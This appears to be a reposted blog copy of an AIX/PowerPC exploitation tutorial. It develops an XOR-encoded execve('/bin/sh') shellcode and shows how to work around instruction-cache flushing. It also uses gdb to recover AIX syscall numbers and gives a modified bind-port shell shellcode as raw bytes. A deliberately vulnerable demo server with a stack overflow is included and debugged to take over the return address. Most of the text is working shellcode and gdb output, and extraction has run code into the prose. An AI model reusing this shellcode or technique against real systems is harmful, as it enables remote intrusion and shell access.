: 0x7ca52a79 0x4082fffd 0x7c6802a6 0x38630101 0x200003f8 : 0x3863ff26 0x39200101 0x3929ff23 0x7cc918ae 0x20000408 : 0x68c7fefe 0x7ce919ae 0x3529ffff 0x4082fff0 0x20000418 : 0xc69dfee3 0x9061fff8 0x90a1fffc 0x3881fff8 0x20000428 : 0x38400005 0x4cc63342 0x44000002 0x2f62696e 0x20000438 : 0x2f736800 0x00000000 0x100005a0 0x00000000 (gdb)
bash-2.05b$ uname -a AIX aix5 1 5 001381144C00 bash-2.05b$ lsattr -El proc0 state enable Processor state False type PowerPC_604 Processor type False frequency 232649620 Processor Speed FalseSo sadly, My box doesn't support cache instructions.
bash-2.05b$ cat testasm.s .globl .main .csect .text[PR] .main: icbi %r6, %r13 dcbf %r6, %r13 bash-2.05b$ gcc testasm.s testasm.s: Assembler messages: testasm.s:4: Error: Unrecognized opcode: `icbi' testasm.s:5: Error: Unrecognized opcode: `dcbf' bash-2.05b$ /usr/ccs/bin/as testasm.s Assembler: testasm.s: line 4: 1252-149 Instruction icbi is not implemented in the current assembly mode COM. testasm.s: line 4: 1252-142 Syntax error. testasm.s: line 5: 1252-149 Instruction dcbf is not implemented in the current assembly mode COM. testasm.s: line 5: 1252-142 Syntax error.Neither GNU's as and system's as cann't recognized these cache instructions. sync and isync were supported.
-bash-2.05b$ cat test.c char shellcode[] = // decoder "\x7c\xa5\x2a\x79" // xor. %r5, %r5, %r5 "\x40\x82\xff\xfd" // bnel .main "\x7c\x68\x02\xa6" // mflr %r3 "\x38\x63\x01\x01" // addi %r3, %r3, 0x101 "\x38\x63\xff\x2e" // addi %r3, %r3, -0xDA # r3 point start of real shellcode-1 "\x39\x20\x01\x01" // li %r9, 0x101 "\x39\x29\xff\x23" // addi %r9, %r9, -0xDD # shellcode size+1 "\x7c\xc9\x18\xae" // lbzx %r6, %r9, %r3 # read a character "\x68\xc7\xfe\xfe" // xori %r7, %r6, 0xFEFE # xor "\x7c\xe9\x19\xae" // stbx %r7, %r9, %r3 # store a character "\x35\x29\xff\xff" // subic. %r9, %r9, 1 "\x40\x82\xff\xf0" // bne Loop # loop "\x7c\x00\x04\xac" // sync "\x4c\x00\x01\x2c" // isync // real shellcode "\xc6\x9d\xfe\xe3" // addi %r3, %r3, 29 "\x6e\x9f\x01\x06" // stw %r3, -8(%r1) "\x6e\x5f\x01\x02" // stw %r5, -4(%r1) "\xc6\x7f\x01\x06" // subi %r4, %r1, 8 "\xc6\xbe\xfe\xfb" // li %r2, 5 "\xb2\x38\xcd\xbc" // crorc %cr6, %cr6, %cr6 "\xba\xfe\xfe\xfc" // svca 0 "\xd1\x9c\x97\x90" // .byte '/', 'b', 'i', 'n', "\xd1\x8d\x96\xfe" // '/', 's', 'h', 0x0 ; int main() { int jump[2]={(int)shellcode,0}; ((*(void (*)())jump)()); }I run this program in gdb direct to check sync and isync whether they work well.
(gdb) r Starting program: /home/san/test Program received signal SIGSEGV, Segmentation fault. 0x20000420 in shellcode () (gdb) x/8i $pc-8 0x20000418The program crashed at 0x20000420 too. I took a breakpoint at 0x20000420 first:: sync 0x2000041c : isync 0x20000420 : addi r3,r3,29 0x20000424 : stw r3,-8(r1) 0x20000428 : stw r5,-4(r1) 0x2000042c : addi r4,r1,-8 0x20000430 : li r2,5 0x20000434 : crorc 4*cr1+eq,4*cr1+eq,4*cr1+eq (gdb) x/24x $pc-56 0x200003e8 : 0x7ca52a79 0x4082fffd 0x7c6802a6 0x38630101 0x200003f8 : 0x3863ff2e 0x39200101 0x3929ff23 0x7cc918ae 0x20000408 : 0x68c7fefe 0x7ce919ae 0x3529ffff 0x4082fff0 0x20000418 : 0x7c0004ac 0x4c00012c 0x3863001d 0x9061fff8 0x20000428 : 0x90a1fffc 0x3881fff8 0x38400005 0x4cc63342 0x20000438 : 0x44000002 0x2f62696e 0x2f736800 0x00000000
(gdb) b *0x20000420 Breakpoint 1 at 0x20000420 (gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/san/test Breakpoint 1, 0x20000420 in shellcode () (gdb) x/8i $pc-8 0x20000418Instruction at 0x20000420 didn't decode! sync and isync have no effect. When I take a breakpoint at isync instruction, it works well too.: sync 0x2000041c : isync 0x20000420 : lfsu f20,-285(r29) 0x20000424 : stw r3,-8(r1) 0x20000428 : stw r5,-4(r1) 0x2000042c : addi r4,r1,-8 0x20000430 : li r2,5 0x20000434 : crorc 4*cr1+eq,4*cr1+eq,4*cr1+eq (gdb) x/24x $pc-56 0x200003e8 : 0x7ca52a79 0x4082fffd 0x7c6802a6 0x38630101 0x200003f8 : 0x3863ff2e 0x39200101 0x3929ff23 0x7cc918ae 0x20000408 : 0x68c7fefe 0x7ce919ae 0x3529ffff 0x4082fff0 0x20000418 : 0x7c0004ac 0x4c00012c 0xc69dfee3 0x9061fff8 0x20000428 : 0x90a1fffc 0x3881fff8 0x38400005 0x4cc63342 0x20000438 : 0x44000002 0x2f62696e 0x2f736800 0x00000000 (gdb)
(gdb) b *0x2000041c Breakpoint 1 at 0x2000041c (gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/san/test Breakpoint 1, 0x2000041c in shellcode () (gdb) c Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. 0x10000100 in ?? () (gdb) c Continuing. $ exitProgram exited normally. Phil of 0dd showed his experience on ARM chip development. He said syscall interrupt can flush instruction cache. So I modified my shellcode as follows:
char shellcode[] = // decoder "\x7d\xce\x72\x79" // xor. %r14, %r14, %r14 "\x40\x82\xff\xfd" // bnel .main "\x7d\xe8\x02\xa6" // mflr %r15 "\x39\xef\x01\x01" // addi %r15, %r15, 0x101 "\x39\xef\xff\x37" // addi %r15, %r15, -0xC9 # r15 point to start of real shellcode "\x3a\x20\x01\x01" // li %r17, 0x101 "\x38\x51\xff\xe1" // addi %r2, %r17, -0x1F # r2=0xe2 syscall number of sync. "\x3a\x31\xff\x2f" // addi %r17, %r17, -0xD1 # shellcode size "\x7e\x51\x78\xae" // lbzx %r18, %r17, %r15 # read a character "\x6a\x53\xfe\xfe" // xori %r19, %r18, 0xFEFE # xor "\x7e\x71\x79\xae" // stbx %r19, %r17, %r15 # store a character "\x36\x31\xff\xff" // subic. %r17, %r17, 1 "\x40\x80\xff\xf0" // bne Loop # loop "\x4c\xc6\x33\x42" // crorc %cr6, %cr6, %cr6 "\x7d\xe8\x03\xa6" // mtlr %r15 # lr=real shellcode address "\x44\xff\xff\x02" // svca 0 // real shellcode "\xc6\x91\xfe\xde" // addi %r3, %r15, 32 "\x6e\x9f\x01\x06" // stw %r3, -8(%r1) "\x83\x3b\x8d\x86" // mr %r5, %r14 "\x6e\x5f\x01\x02" // stw %r5, -4(%r1) "\xc6\x7f\x01\x06" // subi %r4, %r1, 8 "\xc6\xbe\xfe\xfb" // li %r2, 5 "\xb2\x38\xcd\xbc" // crorc %cr6, %cr6, %cr6 "\xba\xfe\xfe\xfc" // svca 0 "\xd1\x9c\x97\x90" // .byte '/', 'b', 'i', 'n', "\xd1\x8d\x96\xfe" // '/', 's', 'h', 0x0 ; int main() { int jump[2]={(int)shellcode,0}; ((*(void (*)())jump)()); } -bash-2.05b$ ./test_3 $ id uid=202(san) gid=1(staff) $ exit -bash-2.05b$It runs well. After syscall, the system executes lr register and the instruction will not be cache. So inserting a syscall before real shellcode is the way to resolve I-cache problem.
--[ 7 - How to debug remote overflow LSD provided some remote shellcodes from UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes.
The following C program describes a simple bind port function.
-bash-2.05b$ cat bind.c #includekfcntl syscall is the last call of dup2 on AIX. -bash-2.05b$ gdb bind GNU gdb 6.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "powerpc-ibm-aix5.1.0.0"... (gdb) disas main Dump of assembler code for function main:#include #include #include int soc,cli,i; struct sockaddr_in serv_addr; int main() { serv_addr.sin_family=2; serv_addr.sin_addr.s_addr=0; serv_addr.sin_port=0x1234; soc=socket(2,1,0); bind(soc,(struct sockaddr *)&serv_addr,0x10); listen(soc,5); cli=accept(soc,0,0); for (i=2;i>=0;i--) { close(i); kfcntl(cli, 0, i); } execve("/bin/sh", 0, 0); }
0x10000534GDB displays entry address of all the functions, and we take breakpoints on these addresses.: mflr r0 0x10000538 : stw r31,-4(r1) 0x1000053c : stw r0,8(r1) 0x10000540 : stwu r1,-72(r1) 0x10000544 : mr r31,r1 0x10000548 : lwz r9,108(r2) 0x1000054c : li r0,2 0x10000550 : stb r0,1(r9) 0x10000554 : lwz r9,108(r2) 0x10000558 : li r0,0 0x1000055c : stw r0,4(r9) 0x10000560 : lwz r9,108(r2) 0x10000564 : li r0,4660 0x10000568 : sth r0,2(r9) 0x1000056c : li r3,2 0x10000570 : li r4,1 0x10000574 : li r5,0 0x10000578 : bl 0x1000734c 0x1000057c : lwz r2,20(r1) 0x10000580 : mr r0,r3 0x10000584 : lwz r9,112(r2) 0x10000588 : stw r0,0(r9) 0x1000058c : lwz r9,112(r2) 0x10000590 : lwz r3,0(r9) 0x10000594 : lwz r4,108(r2) 0x10000598 : li r5,16 0x1000059c : bl 0x10007448 0x100005a0 : lwz r2,20(r1) 0x100005a4 : lwz r9,112(r2) 0x100005a8 : lwz r3,0(r9) 0x100005ac : li r4,5 0x100005b0 : bl 0x1000746c 0x100005b4 : lwz r2,20(r1) 0x100005b8 : lwz r9,112(r2) 0x100005bc : lwz r3,0(r9) 0x100005c0 : li r4,0 0x100005c4 : li r5,0 0x100005c8 : bl 0x10007394 0x100005cc : lwz r2,20(r1) 0x100005d0 : mr r0,r3 0x100005d4 : lwz r9,116(r2) 0x100005d8 : stw r0,0(r9) 0x100005dc : lwz r9,120(r2) 0x100005e0 : li r0,2 0x100005e4 : stw r0,0(r9) 0x100005e8 : lwz r9,120(r2) 0x100005ec : lwz r0,0(r9) 0x100005f0 : cmpwi r0,0 0x100005f4 : bge- 0x100005fc 0x100005f8 : b 0x10000640 0x100005fc : lwz r9,120(r2) 0x10000600 : lwz r3,0(r9) 0x10000604 : bl 0x100074b4 0x10000608 : lwz r2,20(r1) 0x1000060c : lwz r9,116(r2) 0x10000610 : lwz r11,120(r2) 0x10000614 : lwz r3,0(r9) 0x10000618 : li r4,0 0x1000061c : lwz r5,0(r11) 0x10000620 : bl 0x100074d8 0x10000624 : lwz r2,20(r1) 0x10000628 : lwz r11,120(r2) 0x1000062c : lwz r9,120(r2) 0x10000630 : lwz r9,0(r9) 0x10000634 : addi r0,r9,-1 0x10000638 : stw r0,0(r11) 0x1000063c : b 0x100005e8 0x10000640 : lwz r3,124(r2) 0x10000644 : li r4,0 0x10000648 : li r5,0 0x1000064c : bl 0x10007328 0x10000650 : lwz r2,20(r1) 0x10000654 : mr r3,r0 0x10000658 : lwz r1,0(r1) 0x1000065c : lwz r0,8(r1) 0x10000660 : mtlr r0 0x10000664 : lwz r31,-4(r1) 0x10000668 : blr 0x1000066c : .long 0x0 0x10000670 : .long 0x2061 0x10000674 : lwz r0,1(r1) 0x10000678 : .long 0x138 0x1000067c : .long 0x46d61 0x10000680 : xori r14,r11,7936 End of assembler dump.
(gdb) b *0x1000734c Breakpoint 1 at 0x1000734c (gdb) b *0x10007448 Breakpoint 2 at 0x10007448 (gdb) b *0x1000746c Breakpoint 3 at 0x1000746c (gdb) b *0x10007394 Breakpoint 4 at 0x10007394 (gdb) b *0x100074b4 Breakpoint 5 at 0x100074b4 (gdb) b *0x100074d8 Breakpoint 6 at 0x100074d8 (gdb) b *0x10007328 Breakpoint 7 at 0x10007328When the program runs, gdb will break into these functions, so we can obtain syscall numbers of these functions.
(gdb) r Starting program: /home/san/bind Breakpoint 1, 0x1000734c in socket () (gdb) x/8i $pc 0x1000734cOK, we found the syscall numbers in AIX 5.1 that we needed.: lwz r12,4(r2) 0x10007350 : stw r2,20(r1) 0x10007354 : lwz r0,0(r12) 0x10007358 : lwz r2,4(r12) 0x1000735c : mtctr r0 0x10007360 : bctr 0x10007364 : .long 0x0 0x10007368 : .long 0xc8000 (gdb) si 0x10007350 in socket () (gdb) 0x10007354 in socket () (gdb) 0x10007358 in socket () (gdb) 0x1000735c in socket () (gdb) p/x $r2 $1 = 0x8d (gdb) c Continuing. Breakpoint 2, 0x10007448 in bind () (gdb) x/8i $pc 0x10007448 : lwz r12,32(r2) 0x1000744c : stw r2,20(r1) 0x10007450 : lwz r0,0(r12) 0x10007454 : lwz r2,4(r12) 0x10007458 : mtctr r0 0x1000745c : bctr 0x10007460 : .long 0x0 0x10007464 : .long 0xc8000 (gdb) si 0x1000744c in bind () (gdb) 0x10007450 in bind () (gdb) 0x10007454 in bind () (gdb) 0x10007458 in bind () (gdb) p/x $r2 $2 = 0x8c (gdb) c Continuing. Breakpoint 3, 0x1000746c in listen () (gdb) x/8i $pc 0x1000746c : lwz r12,36(r2) 0x10007470 : stw r2,20(r1) 0x10007474 : lwz r0,0(r12) 0x10007478 : lwz r2,4(r12) 0x1000747c : mtctr r0 0x10007480 : bctr 0x10007484 : .long 0x0 0x10007488 : .long 0xc8000 (gdb) si 0x10007470 in listen () (gdb) 0x10007474 in listen () (gdb) 0x10007478 in listen () (gdb) 0x1000747c in listen () (gdb) p/x $r2 $5 = 0x8b (gdb) c Continuing. Breakpoint 4, 0x10007394 in naccept () (gdb) x/8i $pc 0x10007394 : lwz r12,12(r2) 0x10007398 : stw r2,20(r1) 0x1000739c : lwz r0,0(r12) 0x100073a0 : lwz r2,4(r12) 0x100073a4 : mtctr r0 0x100073a8 : bctr 0x100073ac : .long 0x0 0x100073b0 : .long 0xc8000 (gdb) si 0x10007398 in naccept () (gdb) 0x1000739c in naccept () (gdb) 0x100073a0 in naccept () (gdb) 0x100073a4 in naccept () (gdb) p/x $r2 $6 = 0x8a (gdb) c Continuing. Breakpoint 5, 0x100074b4 in close () (gdb) x/8i $pc 0x100074b4 : lwz r12,44(r2) 0x100074b8 : stw r2,20(r1) 0x100074bc : lwz r0,0(r12) 0x100074c0 : lwz r2,4(r12) 0x100074c4 : mtctr r0 0x100074c8 : bctr 0x100074cc : .long 0x0 0x100074d0 : .long 0xc8000 (gdb) si 0x100074b8 in close () (gdb) 0x100074bc in close () (gdb) 0x100074c0 in close () (gdb) 0x100074c4 in close () (gdb) p/x $r2 $7 = 0xa0 (gdb) c Continuing. Breakpoint 6, 0x100074d8 in kfcntl () (gdb) x/8i $pc 0x100074d8 : lwz r12,48(r2) 0x100074dc : stw r2,20(r1) 0x100074e0 : lwz r0,0(r12) 0x100074e4 : lwz r2,4(r12) 0x100074e8 : mtctr r0 0x100074ec : bctr 0x100074f0 : .long 0x0 0x100074f4 : .long 0xc8000 (gdb) si 0x100074dc in kfcntl () (gdb) 0x100074e0 in kfcntl () (gdb) 0x100074e4 in kfcntl () (gdb) 0x100074e8 in kfcntl () (gdb) p/x $r2 $1 = 0x142 (gdb) c Continuing. Breakpoint 7, 0x10007328 in execve () (gdb) x/8i $pc 0x10007328 : lwz r12,0(r2) 0x1000732c : stw r2,20(r1) 0x10007330 : lwz r0,0(r12) 0x10007334 : lwz r2,4(r12) 0x10007338 : mtctr r0 0x1000733c : bctr 0x10007340 : .long 0x0 0x10007344 : .long 0xc8000 (gdb) si 0x1000732c in execve () (gdb) 0x10007330 in execve () (gdb) 0x10007334 in execve () (gdb) 0x10007338 in execve () (gdb) p/x $r2 $9 = 0x5
socket=0x8d bind=0x8c listen=0x8b naccept=0x8a close=0xa0 kfcntl=0x142 execve=0x05We modify a little of LSD's shellcode.
char lsd[] = "\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */ "\x40\x82\xff\xfd" /* bnelIt seems good, let's try remote overflow.*/ "\x7e\xa8\x02\xa6" /* mflr r21 */ "\x3a\xc0\x01\xff" /* lil r22,0x1ff */ "\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */ "\x7e\xb5\xba\x14" /* cax r21,r21,r23 */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "\x05\x82\x53\xa0" /* syscall numbers */ "\x87\xa0\x01\x42" /* execve=0x05 close=0xa0 */ "\x8d\x8c\x8b\x8a" /* socket=0x8d bind=0x8c */ /* listen=0x8b naccept=0x8a */ /* kfcntl=0x142 */ "\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */ "\x44\xff\xff\x02" /* svca 0x0 */ "\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */ "\x2c\x74\x12\x34" /* cmpi cr0,r20,0x1234 */ "\x41\x82\xff\xfd" /* beql */ "\x7f\x08\x02\xa6" /* mflr r24 */ "\x92\x98\xff\xfc" /* st r20,-4(r24) */ "\x38\x76\xfe\x03" /* cal r3,-509(r22) */ "\x38\x96\xfe\x02" /* cal r4,-510(r22) */ "\x98\x78\xff\xf9" /* stb r3,-7(r24) */ "\x7e\x85\xa3\x78" /* mr r5,r20 */ "\x88\x55\xff\xfc" /* lbz r2,-4(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x7c\x79\x1b\x78" /* mr r25,r3 */ "\x38\x98\xff\xf8" /* cal r4,-8(r24) */ "\x38\xb6\xfe\x11" /* cal r5,-495(r22) */ "\x88\x55\xff\xfd" /* lbz r2,-3(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x7f\x23\xcb\x78" /* mr r3,r25 */ "\x38\x96\xfe\x06" /* cal r4,-506(r22) */ "\x88\x55\xff\xfe" /* lbz r2,-2(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x7f\x23\xcb\x78" /* mr r3,r25 */ "\x7e\x84\xa3\x78" /* mr r4,r20 */ "\x7e\x85\xa3\x78" /* mr r5,r20 */ "\x88\x55\xff\xff" /* lbz r2,-1(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x7c\x79\x1b\x78" /* mr r25,r3 */ "\x3b\x56\xfe\x03" /* cal r26,-509(r22) */ "\x7f\x43\xd3\x78" /* mr r3,r26 */ "\x88\x55\xff\xf7" /* lbz r2,-9(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x7f\x23\xcb\x78" /* mr r3,r25 */ "\x7e\x84\xa3\x78" /* mr r4,r20 */ "\x7f\x45\xd3\x78" /* mr r5,r26 */ "\xa0\x55\xff\xfa" /* lhz r2,-6(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x37\x5a\xff\xff" /* ai. r26,r26,-1 */ "\x40\x80\xff\xd4" /* bge */ "\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */ "\x40\x82\xff\xfd" /* bnel */ "\x7f\xe8\x02\xa6" /* mflr r31 */ "\x3b\xff\x01\x20" /* cal r31,0x120(r31) */ "\x38\x7f\xff\x08" /* cal r3,-248(r31) */ "\x38\x9f\xff\x10" /* cal r4,-240(r31) */ "\x90\x7f\xff\x10" /* st r3,-240(r31) */ "\x90\xbf\xff\x14" /* st r5,-236(r31) */ "\x88\x55\xff\xf4" /* lbz r2,-12(r21) */ "\x98\xbf\xff\x0f" /* stb r5,-241(r31) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "/bin/sh" ; int main() { int jump[2]={(int)lsd,0}; ((*(void (*)())jump)()); }
/* server.c - overflow demo * * 2004.06.16 * san@nsfocus.com */ #includeThe debugs in remote and local buffer overflow are not different, and the key is to find the overflow point. You may need construct various network data structures in remote overflow. The following is the debug process that uses gdb to find return address and the overflow buffer size. -bash-2.05b$ gdb server GNU gdb 6.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "powerpc-ibm-aix5.1.0.0"... (gdb) r Starting program: /home/san/server Client connect to server and send overrun data. -bash-2.05b$ telnet localhost 4444 Trying... Connected to localhost. Escape character is '^]'. ABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCD Server side will receive a Segmentation fault. Program received signal SIGSEGV, Segmentation fault. 0x41424344 in ?? () (gdb) x/8x $r1 0x2ff22b58: 0x41424344 0x41424344 0x41424344 0x0d0a6648 0x2ff22b68: 0x00000000 0x20001000 0x20001110 0x0000005e We must overwrite r1+8 that the value of lr register after function return. Then, all of the register like below:#include #include #include char Buff[1024]; void overflow(char * s,int size) { char s1[50]; printf("receive %d bytes",size); s[size]=0; //strcpy(s1,s); memcpy(s1, s, size); // There must be a syscall after overflow at least, otherwise I-cache will afflict you. ;-) sync(); } int main(int argc, char *argv[]) { int s, c, ret, lBytesRead; struct sockaddr_in srv; s = socket(AF_INET, SOCK_STREAM, 0); srv.sin_addr.s_addr = INADDR_ANY; srv.sin_port = htons(4444); srv.sin_family = AF_INET; bind(s, &srv, sizeof(srv)); listen(s, 3); c = accept(s,NULL,NULL); while(1) { lBytesRead = recv(c, Buff, 1024, 0); if(lBytesRead<=0) break; printf("fd = %x recv %d bytes\n", c, lBytesRead); overflow(Buff, lBytesRead); ret=send(c,Buff,lBytesRead,0); if(ret<=0) break; } close(s); close©; }
(gdb) i reg r0 0x41424344 1094861636 r1 0x2ff22b58 804399960 r2 0x20001000 536875008 r3 0x1757180 24473984 r4 0x0 0 r5 0x2ff22ffc 804401148 r6 0xd032 53298 r7 0x0 0 r8 0x60000000 1610612736 r9 0x600045f0 1610630640 r10 0x0 0 r11 0x60003bca 1610628042 r12 0x2ff3b400 804500480 r13 0xdeadbeef -559038737 r14 0x1 1 r15 0x2ff22c08 804400136 r16 0x2ff22c10 804400144 r17 0x0 0 r18 0xdeadbeef -559038737 r19 0xdeadbeef -559038737 r20 0xdeadbeef -559038737 r21 0xdeadbeef -559038737 r22 0xdeadbeef -559038737 r23 0xdeadbeef -559038737 r24 0xdeadbeef -559038737 r25 0xdeadbeef -559038737 r26 0xdeadbeef -559038737 r27 0xdeadbeef -559038737 r28 0x20000640 536872512 r29 0x10000000 268435456 r30 0x3 3 r31 0x41424344 1094861636 pc 0x41424344 1094861636 ps 0x4000d032 1073795122 cr 0x2a222828 706881576 lr 0x41424344 1094861636 ctr 0x0 0 xer 0x0 0 fpscr 0x0 0 vscr 0x0 0 vrsave 0x0 0Tutorial How to Exploit Can U get on here : black-mygo.blogspot.com
0 comments:
Post a Comment